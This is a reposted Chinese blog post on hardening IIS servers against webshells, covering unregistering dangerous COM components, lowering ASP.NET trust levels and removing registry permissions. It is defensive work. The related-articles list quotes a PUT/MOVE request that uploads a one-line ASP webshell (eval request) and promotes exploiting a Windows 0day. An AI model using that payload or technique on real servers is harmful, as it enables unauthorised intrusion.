Windows安全设置IIS防WebShell木马(转)

最新推荐文章于 2020-09-15 09:49:55 发布
最新推荐文章于 2020-09-15 09:49:55 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: 工作经验

转:http://blog.onovps.com/archives/iis-aspspy.html

1.ASP环境禁用Webshell危险的组件:

1
2
3
4
5
6
7
8

regsvr32 /u wshom.ocx
#卸载WScript.Shell 组件 
regsvr32 /u shell32.dll
#卸载Shell.application 组件
regsvr32 /u scrrun.dll
#卸载FSO对象
regsvr32 /u msado15.dll
#卸载stream对象

2.ASPX环境调整ASP.NET信任级别, ASPX运行ASPXspy之类的木马会出现错误信息:
编辑Framework配置文件: 
1

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config

修改为: 
1
2
3
4
5
6
7
8
9
10
11
12
13

<location allowOverride="false"> #禁止用户自定义级别
        <system.web>
            <securityPolicy>
                <trustLevel name="Full" policyFile="internal"/>
                <trustLevel name="High" policyFile="web_hightrust.config"/>
                <trustLevel name="Medium" policyFile="web_mediumtrust.config"/>
                <trustLevel name="Low" policyFile="web_lowtrust.config"/>
                <trustLevel name="Minimal" policyFile="web_minimaltrust.config"/>
            </securityPolicy>
            <trust level="High" originUrl=""/> #级别为高,默认为完全
            <identity impersonate="true" />
        </system.web>
    </location>

ASP.NET各信任级别权限如下: 
1
2
3
4
5

完全:无限制的权限。应用程序可访问任何属于操作系统安全范围的资源。支持所有的特权操作;
高:不能调用未托管代码、不能调用服务组件、写入事件日志、访问 Microsoft 消息队列、访问 OLE DB 数据源;
中:除上述限制外,还限制访问当前应用程序目录中的文件,不允许访问注册表;
低:除上述限制外,应用程序不能与 SQL Server 连接,代码不能调用 CodeAccessPermission.Assert(无断言安全权限);
最低:仅有执行权限。

高级别禁止读取注册表,编辑高级别配置文件: 
1

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\web_hightrust.config

删除注册表权限: 
1
2
3

#http://www.onovps.com
<SecurityClass Name="RegistryPermission" Description="System.Security.Permissions.RegistryPermission, 
mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/>

然后配置IIS为net为2.0版本,重启IIS。 
1
2

cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 
aspnet_regiis -i

iis切换net版本.png
单一禁止IISSPY还可修改以下文件权限: 
1
2

/windows/system32/activeds.tlb
#去除文件Users组和Power Users组读取权限

双刃剑客
关注
专栏目录
WebShell 木马免杀过WAF
悦分享
08-02 641
什么是WAFWaf是web应用火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供护,也称作应用火墙,是网络安全纵深御体系里重要的一环。waf属于检测型及纠正型御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级waf。WAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
最新织梦cms漏洞之安全设置,有效木马(更新至20190920)
东北狼仙
10-22 1594
织梦CMS在安装完成后,新人往往会直接开始开发使用,忽视了一些安全优化的操作,这样会导致后期整个系统安全系数降低,被黑或者被注入的概率极高,毕竟这世界百分百存在着极多的无聊hacker对全网的网站进行扫描,扫到你这个菜站,尤其是使用率极高的DEDECMS,对你的站点下手的欲望更高,所以在开发前做好安全范还是很有必要的! 安全设置前:备份网站文件及数据库 系统安全优化设置之前,做好备份工作。 ...
IIS权限WEBSHELL全套
12-28
IIS权限WEBSHELL全套
加固IISWebshell无用武之地
HadesHai
04-28 1010
<br />程序网络工作组ASP站点管理员(ASPAdmin) V1.02 下载<br />用微软 的IIS 打造一个WEB服务器 是件非常简单的事情,但是它的安全性实在不敢恭维。攻击者通过注入、上传、旁注等技术获得了某个网站的webshell ,然后进一步渗透提权,直至控制整个服务器 。至于如何让攻击者无缘webshell 那是代码部分的问题,我们做为管理员应该如何加固Web服务器 ,让攻击者在获得了webshell 之后无功而返呢? <br />  一、设置命令权限 <br />  默认设置下,webs
防止webshell
软件哲学
03-09 1381
  ASP木马Webshell安全范解决办法 更新时间:2007-1-15  注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER | IIS5.0/IIS6.0 1、首先我们来看看一般ASP木马Webshell所利用的A
针对IIS权限漏洞的获取webshell方法
vcdy
09-04 2720
向网站写入2.txt 内容为一句话木马 PUT /2.txt HTTP/1.1 Destination: /teslt.asp;.jpg Host: 219.153.49.228:43289 Content-Length: 4   &lt;%eval request("chopper")%&gt;   改2.txt为2.asPp MOVE /2.txt HTTP/1.1 De...
ASP木马Webshell安全解决方案
03-04
ASP 木马 Webshell 安全解决方案 根据提供的文件信息,以下是相关的知识点: 1. ASP 木马 Webshell 的组件:在...ASP 木马 Webshell 安全解决方案的关键是删除或更名危险的 ASP 组件,以保护 WEB SERVER IIS安全
服务器IIS安全加固
LuHai3005151872的博客
09-15 769
IS简介: Windows®Server的Internet信息服务(IIS)是一种灵活,安全且可管理的World Wide Web server,用于承载Web上的任何内容。从媒体流到Web应用程序,IIS的可扩展和开放式体系结构随时可以处理最苛刻的任务。 安全加固: 1、删除默认站点: IIS安装完成之后会在建立一个默认站点,一般建立网站时不需要这个站点,一方面该站点默认占用80端口,一方面可能该站点安全性配置较低。 2、禁用不必要的Web服务拓展: ISAPI(Internet服务器应用程序编程接口).
网站安全IIS版 v4.0.27337
10-30
网站安全IIS版v4.0.27337版更新:引入AI引擎提升Webshell检测能力1、引入AI引擎,提升webshell查杀能力。2、完善浏览护功能,修复在64位环境下32位站点浏览护问题;3、修复上传护拦截页面问题。
windows最新0day(webshell)
04-28
win最新本地提权0day webshell版暂时没打补丁的还有很多。赶快利用
asp.net webshell
06-24
asp.net webshell ASP.NET WEBSHELL
webshell下查iis站配置(基本)
Coisini的博客
05-25 454
默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml, 路径是C:\WINDOWS\system32\inetsrv(一般这个目录设置的everyone读的权限.) MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS设置的站点目录和配置。 几个主要的配置有: ServerComment:我的网站 //站点的名称 ServerBind...
虚拟主机封杀webshell提权
kendyhj9999的专栏
03-11 1200
1.为了打造一个安全的虚拟主机,在asp SQL环境下,我们要做的是封杀ASP webshell.封杀serv-u提权漏洞和SQL注入的威胁 http://www.west263.cn/info/html/wangzhanyunying/jianzhanjingyan/20080417/68200.html 2.默认安装的win主机上webshell功能十分强大,我们要封杀webs
封杀webshell提升权限
ardu熊
12-31 795
 文章简介:封杀webshell提升权限 1.为了打造一个安全的虚拟主机,在asp sql环境下,我们要做的是封杀asp webshell.封杀serv-u提权漏洞和sql注入的威胁 2.默认安装的win主机上webshell功能十分强大,我们要封杀webshell的哪些功能 也就是不让webshell查看系统服务信息,执行cmd命令和封杀webshell提升权限1.为了打造一个安全的虚拟主机
Windows服务器SYSTEM权限Webshell无法添加管理账户情况突破总结
weixin_34267123的博客
03-16 925
Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:I.杀软篇1,360杀毒软件2,麦咖啡杀毒软件3,卡巴斯基杀毒软件4,其他杀毒软件或护软件II.策略篇1,3389端口变更2,莫名其妙无法添加账户3,管理员限制篇4,系统已达最大连接数处理-----------------------I. ...
IIS7.0应用程序 .NET信任级别的区分
u011894253的专栏
08-25 1324
level="[Full|High|Medium|Low|Minimal]"     originUrl="URL"    processRequestInApplicationTrust = "[True|False]"  /> level   必需的 String 属性。 指定将运行应用程序的信任级别。每个信任级别使用配置文件中的 trustLevel 元素映射到单个 XML 
Asp.Net提权设置 (对正常操作无影响)
收集盒 Book box
09-16 617
几天前,一个朋友让我帮他搞下服务器安全,结果发现服务器上都是Asp.Net的站,不过放旁注做的不错,只不过能执行命令,对服务器不安全。直到有一天,我入侵一个国外的网站,发现死活执行不了命令,想看看他安全怎么做的,我也学学,之后就下载回配置文件了,回去一分析,发现除了授权级别和授权
windows2008 禁止普通用户随意上网访问
Le3600(果子)的专栏
10-23 5028
通常操作系统windows 2008 server系统都被安装到重要的计算机中,为了防止该计算机系统受到安全威胁,我们往往需要想办法限制普通用户在该系统中随意上网访问;但是如果简单关闭该系统的上网访问权限,又会影响特权用户正常上网,那么我们如何才能限制普通用户上网,而又不影响特权用户进行上网访问呢?其实很简单,我们可以按照下面的操作来修改操作系统windows 2008 server系统的组策略参
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值